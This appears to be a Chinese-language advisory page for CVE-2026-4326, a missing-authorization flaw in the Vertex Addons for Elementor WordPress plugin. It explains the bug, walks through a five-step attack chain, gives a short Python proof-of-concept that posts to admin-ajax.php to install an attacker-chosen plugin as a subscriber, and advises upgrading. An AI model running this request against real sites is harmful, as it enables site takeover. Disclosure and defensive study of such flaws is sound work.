CVE-2026-4326 CVSS 8.8 高危

CVE-2026-4326: WordPress插件权限缺失漏洞

披露日期: 2026-04-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4326

漏洞类型

权限缺失

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Vertex Addons for Elementor

漏洞概述

WordPress插件Vertex Addons for Elementor在1.6.4及更早版本中存在权限缺失漏洞。由于activate_required_plugins()函数未在权限检查失败时终止程序，低权限攻击者（如订阅者）可绕过限制，安装并激活任意插件，进而可能导致服务器被完全接管。

技术细节

该漏洞位于插件app/Ajax.php文件的activate_required_plugins()函数中。代码逻辑缺陷在于使用current_user_can('install_plugins')检查权限时，若检查失败仅设置错误变量而不退出，导致后续安装代码仍被执行。这意味着即便是仅拥有订阅者权限的低级别用户，在发起请求后，程序会忽略权限校验结果，继续执行后续的插件下载与激活操作。攻击者可利用此漏洞，从WordPress仓库安装并激活任意恶意插件，从而在服务器上执行任意代码，完全控制受影响站点。

攻击链分析

STEP 1

步骤1

攻击者注册或获取一个WordPress订阅者级别的低权限账户。

STEP 2

步骤2

攻击者向admin-ajax.php发送包含恶意插件slug的POST请求，调用activate_required_plugins函数。

STEP 3

步骤3

服务器端current_user_can检查失败，但因逻辑缺陷未终止程序，继续执行安装代码。

STEP 4

步骤4

WordPress自动下载并激活攻击者指定的恶意插件。

STEP 5

步骤5

攻击者利用已激活的恶意插件功能，在服务器上执行代码或获取敏感数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# PoC for CVE-2026-4326
# This script demonstrates how a low-privileged user can trigger plugin installation.

import requests

target_url = "http://example.com/wp-admin/admin-ajax.php"
# Attacker's cookies (Subscriber level)
cookies = {
    "wordpress_logged_in_xxx": "attacker_cookie_value"
}

# Payload to install a specific plugin
payload = {
    "action": "activate_required_plugins",
    "plugin_slug": "malicious-plugin", 
    "nonce": "valid_nonce_if_required" # Some implementations might check nonces
}

response = requests.post(target_url, data=payload, cookies=cookies)

if response.status_code == 200:
    print("[+] Request sent successfully. Check if plugin was installed.")
else:
    print("[-] Request failed.")

影响范围

Vertex Addons for Elementor <= 1.6.4

防御指南

临时缓解措施

建议立即将插件升级到最新修复版本。若无法立即升级，应暂时禁用该插件，并严格审查后台用户权限，删除非必要的低权限账户，防止被恶意利用。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表